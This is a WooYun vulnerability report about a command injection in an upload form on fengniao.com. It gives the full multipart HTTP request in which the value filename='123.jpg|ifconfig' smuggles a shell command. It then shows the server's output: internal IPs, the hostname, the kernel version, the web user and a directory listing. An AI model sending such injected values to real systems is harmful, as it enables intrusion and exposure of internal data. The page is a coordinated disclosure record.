当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150654

漏洞标题:蜂鸟网主站操作系统任意命令执行漏洞(奇葩漏洞)

相关厂商:fengniao.com

漏洞作者: missy

提交时间:2015-11-11 14:02

修复时间:2015-12-26 14:32

公开时间:2015-12-26 14:32

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

详细说明:

POST /topic/seagate/upload.php HTTP/1.1
Host: www.fengniao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.fengniao.com/topic/seagate/upload.php
Cookie: __utma=1727398.213344896.1446190154.1446190154.1446190154.1; __utmb=1727398.5.10.1446190154; __utmc=1727398; __utmz=1727398.1446190154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; mltn=@4~6171412388184999580>1>1446190123461>1>1446190123461>6171412388184999579>1446190123461@; mlti=@4~144619015498015232@; mlts=@4~5@; ip_ck=5cWA5fj2j7QuMjIxMjIxLjE0NDYxOTAxMjQ%3D; lv=1446190160; vn=1; z_pro_city=s_provice%3Dbeijingshi%26s_city%3D; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1446190399; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1446190406; bdshare_firstime=1446190400217
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------157521457315459
Content-Length: 4699
-----------------------------157521457315459
Content-Disposition: form-data; name="tijiao"
1
-----------------------------157521457315459
Content-Disposition: form-data; name="username"
11111
-----------------------------157521457315459
Content-Disposition: form-data; name="realname"
111
-----------------------------157521457315459
Content-Disposition: form-data; name="age"
11
-----------------------------157521457315459
Content-Disposition: form-data; name="city"
1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="mobile"
1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------157521457315459
Content-Disposition: form-data; name="title"
1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig"
Content-Type: image/jpeg
ÿØÿà


问题出题上传文件名处filename  ;Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig" 利用隧道通配符可执行系统任意命令


1.jpg


eth0      Link encap:Ethernet  HWaddr 00:50:56:B4:AD:E2  
          inet addr:10.15.184.191  Bcast:10.15.191.255  Mask:255.255.248.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3346812881 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2278368580 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1366729260678 (1.2 TiB)  TX bytes:607313144058 (565.6 GiB)
eth1      Link encap:Ethernet  HWaddr 00:50:56:B4:E5:D9  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:103585252 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6274065644 (5.8 GiB)  TX bytes:4104 (4.0 KiB)
eth2      Link encap:Ethernet  HWaddr 00:50:56:B4:04:DB  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:103570105 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6273140102 (5.8 GiB)  TX bytes:3762 (3.6 KiB)
eth3      Link encap:Ethernet  HWaddr 00:50:56:B4:33:48  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:103553778 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6272150125 (5.8 GiB)  TX bytes:3762 (3.6 KiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:141456524 errors:0 dropped:0 overruns:0 frame:0
          TX packets:141456524 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:34148334880 (31.8 GiB)  TX bytes:34148334880 (31.8 GiB)
lo:0      Link encap:Local Loopback  
          inet addr:10.15.187.253  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1


2.jpg


Linux c25-fn-bbs-web3.cnet.com.cn 2.6.18-308.4.1.el5.centos.plus #1 SMP Tue Apr 17 21:00:16 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux


3.jpg


当前目录:/export/home/cms/www.fengniao.com/www/topic/seagate


4.jpg


apache


5.jpg


1.html
1.php
22.php
admin_ranks.php
admin_ranks1.php
c_data.php
comment.php
counts.php
css
delete.php
doc
dongtai.php
entries.php
error.php
function1.php
huojiang.php
iframe.php
iframe1.php
images
include
index.php
index1.php
index_1.php
index_2.php
index_old.php
js
list.php
next.php
photo_list.php
pic.php
post.php
product
t.html
test.html
upload.php
upload_c.php
user_pic.php
user_pic1.php
user_pic2.php
vote.php
xin.jpg
zhiye.php

漏洞证明:

修复方案:

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-11 14:31

厂商回复:

非常感谢

最新状态:

暂无